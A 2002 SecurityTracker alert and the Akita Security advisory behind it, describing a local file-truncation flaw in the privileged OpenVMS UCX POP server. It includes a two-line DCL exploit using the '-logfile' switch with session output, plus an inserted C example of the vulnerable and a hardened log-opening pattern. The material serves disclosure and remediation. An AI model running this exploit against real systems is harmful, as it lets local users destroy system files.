Compaq OpenVMS UCX POP Mail Server Lets Local Users Overwrite Arbitrary Files

SecurityTracker Alert ID: 1005294
CVE Reference: GENERIC-MAP-NOMATCH
Date: Sep 26 2002
Impact: Denial of service via local system, Modification of system information
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Description: A vulnerability was reported in the OpenVMS UCX POP mail server. A local user can erase the contents of arbitrary files on the system.

Akita Security issued an advisory warning that a local user can overwrite arbitrary files with a 0 byte file. According to the report, the UCX POP server binary (SYS$SYSTEM:UCX$POP_SERVER.EXE) is installed with the VMS privileges BYPASS and SYSPRV. The BYPASS privilege apparently allows the POP server to override filesystem permissions. A local user can exploit the '-logfile' command line switch to cause the POP server to open an arbitrary file for writing, thereby truncating the existing file.

A demonstration exploit is provided:

$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
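The defect class described above (a privileged server that opens whatever path follows -logfile for writing, truncating the target) beside a hardened form, as an added example in portable POSIX C; it is not the UCX POP server's code, and LOG_DIR, open_log_unsafe, resolve_log_path and open_log_hardened are hypothetical names. The vendor's actual fix was simply to disable the switch.

```c
/* Added example, not code from the UCX POP server or from Akita Security.
 * Models the defect in the advisory: a privileged daemon opens an
 * attacker-chosen "-logfile" path for writing. LOG_DIR and all function
 * names are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define LOG_DIR "/var/log/popd"   /* fixed, trusted log directory (assumed) */

/* Vulnerable pattern: "w" truncates the named file to 0 bytes, and the
 * daemon's privileges (BYPASS/SYSPRV in the advisory) override protection. */
FILE *open_log_unsafe(const char *arg) {
    return fopen(arg, "w");
}

/* Hardened pattern, step 1: the argument may only be a plain file name made
 * of [A-Za-z0-9_.-], not starting with '.', and is joined to LOG_DIR.
 * Returns 1 and fills out[] on success, 0 if the argument is rejected. */
int resolve_log_path(const char *arg, char *out, size_t outlen) {
    size_t n = strlen(arg);
    if (n == 0 || n > 64 || arg[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        char c = arg[i];
        int ok = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.';
        if (!ok)            /* rejects '/', ':', '[', ']', '$', and so on */
            return 0;
    }
    if (snprintf(out, outlen, "%s/%s", LOG_DIR, arg) >= (int)outlen)
        return 0;
    return 1;
}

/* Hardened pattern, step 2: open append-only and without following symlinks,
 * so an existing file is never truncated even if the name check is wrong.
 * Returns a descriptor, or -1 if the name was rejected or open() failed. */
int open_log_hardened(const char *arg) {
    char path[256];
    if (!resolve_log_path(arg, path, sizeof path))
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_NOCTTY, 0640);
}
```

Dropping the privileges before the open, or refusing the switch entirely as the ECO does, removes the remaining risk that the fixed directory itself is mis-protected.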

Impact: A local user can overwrite arbitrary files with 0 bytes to create denial of service conditions.

Solution: Compaq has issued an ECO (ECO B, 1-JUL-2002, Alpha and VAX) that disables the "-logfile" command line switch, which is not needed on OpenVMS.
Deliverables: TCPIP$POP_SERVER.EXE V5.3-18B

Vendor URL: www.compaq.com/

Cause: Access control error

Underlying OS: OpenVMS

Reported By: "Mike Riley" <mike@akitanet.co.uk>

Message History: None.

Source Message Contents

Date: Fri, 27 Sep 2002 13:26:10 +0100
From: "Mike Riley" <mike@akitanet.co.uk>
Subject: OpenVMS POP server local vulnerability
Akita Security Advisory 27/09/2002
OpenVMS UCX$POP_SERVER.EXE vulnerability
Advisory:
http://www.akita-security.co.uk/VMS/ucx_pop_server.txt
VMS security tool
http://www.akita-security.co.uk/stoat
Overview
========
UCX is the main TCP/IP stack for OpenVMS. Akita Security have
discovered a vulnerability in every version of the UCX pop
server which allows a local user to overwrite any file on the
system with a 0 byte file.
Due to the popularity of UCX this problem will be widespread
amongst OpenVMS installations.
This issue was discovered as part of wider research into OpenVMS
security. Many issues have been found, and further advisories
will be released shortly.
Detail
======
The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is
installed with the VMS privileges BYPASS and SYSPRV:
INSTALL> list ucx$pop_server.exe /full
DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE
UCX$POP_SERVER;1 Prv
Entry access count = 1
Privileges = SYSPRV BYPASS
INSTALL>
The BYPASS privilege allows the pop server to override filesystem
permissions. By use of the -logfile command line switch, it is
possible to persuade the server to open a file anywhere, or to
truncate an existing file, as follows:
____________________________________________________________________
$ show process/privs
25-SEP-2002 10:47:35.02 User: MIKE Process ID: 0000013F
Node: VAX Process name: "_TNA21:_1"
Authorized privileges:
NETMBX TMPMBX
Process privileges:
NETMBX may create network device
TMPMBX may create temporary mailbox
Process rights:
INTERACTIVE
REMOTE
System rights:
SYS$NODE_VAX
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
19102-09-24 17:41:39 sizeof(block_wait_times) 160
19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32
19102-09-24 17:41:40 num_elems 5
[SNIP]
^C
$ dir/prot sys$system:I_*
Directory SYS$SYSROOT:[SYSEXE]
I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1
insufficient privilege or object protection violation
Total of 1 file.
____________________________________________________________________
The file created looks like this:
____________________________________________________________________
Directory SYS$SYSROOT:[SYSEXE]
I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1 File ID: (9499,485,0)
Size: 0/0 Owner: [SYSTEM]
Created: 24-SEP-2002 17:41:41.14
Revised: 24-SEP-2002 17:41:57.09 (1)
Expires: <None specified>
Backup: <No backup recorded>
Effective: <None specified>
Recording: <None specified>
File organization: Sequential
Shelved state: Online
File attributes: Allocation: 0, Extend: 0, Global buffer count: 0
No version limit
Record format: Stream_LF, maximum 0 bytes, longest 32767 bytes
Record attributes: Carriage return carriage control
RMS attributes: None
Journaling enabled: None
File protection: System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List: None
Total of 1 file, 0/0 blocks.
____________________________________________________________________
Severity
========
At the least, this bug could be used by a local user to destroy an
OpenVMS installation, or overwrite logfiles. If a local user could
control the log output of the pop server it could probably be used
to gain full privileges, although this is speculation on our part.
Workaround
==========
Remove world execute permissions for the pop server binary.
Vendor status
=============
Akita Security informed Compaq of this vulnerability on 14/06/2002.
Compaq have released an ECO which corrects the problem:
____________________________________________________________________
ECO B 1-JUL-2002 Alpha and VAX
Problem:
Disable the "-logfile" command line switch, which is not needed on
OpenVMS.
Deliverables:
TCPIP$POP_SERVER.EXE V5.3-18B
Reference:
Internal testing.
____________________________________________________________________
Please note the lack of reference to a security problem, and the
lack of credit to Akita Security. Internal testing?
Credit
======
This issue was discovered by mike@akita.co.uk
--
Mike Riley - Security Systems manager @ Akita
http://www.akita-security.co.uk
--------------------------------------------------------------------
Sales: T:+44(0)1869 320111 F: +44(0)1869250688 E: sales@akita.co.uk
Tech: T: +44(0)1869 320111 E: mike@akita.co.uk
--------------------------------------------------------------------
"Security, performance, cost - pick two"